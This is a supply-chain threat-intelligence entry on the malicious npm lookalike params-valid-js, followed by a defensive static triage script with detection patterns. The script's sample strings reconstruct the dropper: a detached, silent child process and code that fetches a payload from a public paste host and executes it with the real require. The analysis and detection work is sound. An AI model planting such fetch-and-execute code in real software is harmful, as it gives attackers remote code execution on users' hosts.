Supply-chain threat intelligence
Risk score
92
Indexed incident for params-valid-js (npm).
params-valid-js impersonates the well-known request package (it copies Mikeal Rogers' Apache-2.0 header, points its bugs URL at github.com/request/request/issues, and replicates request's API surface) while shipping a remote-code dropper. index.js exports a function shaped like Express middleware ((req,res,next)=>next()) as module.exports, default, and reqValidator. When invoked, the middleware calls swapJson(...), which spawns node lib/callers.js with { detached: true, stdio: 'ignore' } and calls child.unref(), so the child runs detached from the parent and produces no visible output. lib/callers.js then performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), extracts data.Cookie, and executes the response body with new Function.constructor('require', s); handler(require);, passing the real require into the fetched code. jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack therefore triggers arbitrary remote code execution on the host as soon as the middleware is invoked.
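A static triage heuristic for the dropper shape described above, added here as an example and not taken from the incident record or the package: it inspects package.json and source text only and never executes the package. The package metadata and source strings are constructed samples that mirror the described layout; the paste id in them is a placeholder, and the check ids and threshold are this example's own.

```javascript
// Constructed for this example; not the incident's or the package's own code.
// Static triage of an npm package for the dropper shape described above.
// It never executes the package: it only inspects package.json and source text.
const PASTE_HOSTS = ['jsonkeeper.com']; // host named in the incident; extend as needed

const SOURCE_CHECKS = [
  // a child process that is detached, silenced, and dropped from the event loop
  { id: 'detached-silent-spawn',
    test: s => /detached\s*:\s*true/.test(s) && /stdio\s*:\s*['"]ignore['"]/.test(s) && /\.unref\(\)/.test(s) },
  // fetched text compiled into a function that is handed the real require
  { id: 'dynamic-function-given-require',
    test: s => /Function(?:\.constructor)?\s*\(\s*['"]require['"]/.test(s) && /\(\s*require\s*\)/.test(s) },
  // an HTTP fetch whose target is an anonymous, mutable paste host
  { id: 'fetch-from-paste-host',
    test: s => /axios\.get\(|fetch\(|https?\.get\(/.test(s) && PASTE_HOSTS.some(h => s.includes(h)) },
];

function scanSource(source) {
  return SOURCE_CHECKS.filter(c => c.test(source)).map(c => c.id);
}

// Impersonation check: metadata links that name a GitHub project other than the package itself
function scanMetadata(pkg) {
  const links = [pkg.bugs && pkg.bugs.url, pkg.homepage,
                 pkg.repository && pkg.repository.url].filter(Boolean);
  const findings = [];
  for (const link of links) {
    const m = /github\.com\/([^/]+)\/([^/#.]+)/.exec(link);
    if (m && m[2] !== pkg.name) findings.push(`metadata-names-other-project:${m[1]}/${m[2]}`);
  }
  return findings;
}

// Two or more independent findings across metadata and code are treated as suspicious
function triage(pkg, sources) {
  const findings = [...scanMetadata(pkg), ...sources.flatMap(scanSource)];
  return { findings, suspicious: findings.length >= 2 };
}

// Constructed samples mirroring the described layout (placeholder paste id, not the real files)
const SAMPLE_PKG = { name: 'params-valid-js', bugs: { url: 'https://github.com/request/request/issues' } };
const SAMPLE_INDEX = `const { spawn } = require('child_process');
module.exports = (req, res, next) => { const c = spawn(process.execPath, ['lib/callers.js'],
  { detached: true, stdio: 'ignore' }); c.unref(); next(); };`;
const SAMPLE_CALLER = `const axios = require('axios');
axios.get('https://www.jsonkeeper.com/b/<placeholder-id>').then(r => {
  const handler = new Function.constructor('require', r.data.Cookie); handler(require); });`;
const SAMPLE_RESULT = triage(SAMPLE_PKG, [SAMPLE_INDEX, SAMPLE_CALLER]);
console.log(SAMPLE_RESULT); // suspicious: true, four findings
```

The metadata check alone is weak evidence (forks legitimately link upstream issue trackers), which is why the verdict requires agreement between metadata and code findings.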
Affected versions
Indicators
Timeline